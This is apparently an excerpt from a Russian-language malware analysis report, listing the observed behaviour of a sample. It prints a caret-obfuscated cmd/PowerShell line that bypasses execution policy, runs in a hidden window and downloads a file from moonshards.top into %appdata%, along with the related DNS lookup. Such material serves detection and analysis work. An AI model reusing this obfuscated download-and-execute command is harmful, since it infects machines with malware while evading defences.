Техническая информация
- http://moonshards.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOW^erSHELL.E^xe ^-^ex^e^Cut^i^On^P^O^L^iCy BY^pAS^S ^-^n^Op^R^Of^IL^e -w^IN^d^oW^S^T^y^lE^ hI^D^D^en (new-^Ob^jECt SYStem^.nE^T.Web^CLiENt)^.do^WnloA^dF^iLE('http://moonsh...
- DNS ASK mo###hards.top
- '<SYSTEM32>\cmd.exe' /C "pOW^erSHELL.E^xe ^-^ex^e^Cut^i^On^P^O^L^iCy BY^pAS^S ^-^n^Op^R^Of^IL^e -w^IN^d^oW^S^T^y^lE^ hI^D^D^en (new-^Ob^jECt SYStem^.nE^T.Web^CLiENt)^.do^WnloA^dF^iLE('http://moonsh...' (со скрытым окном)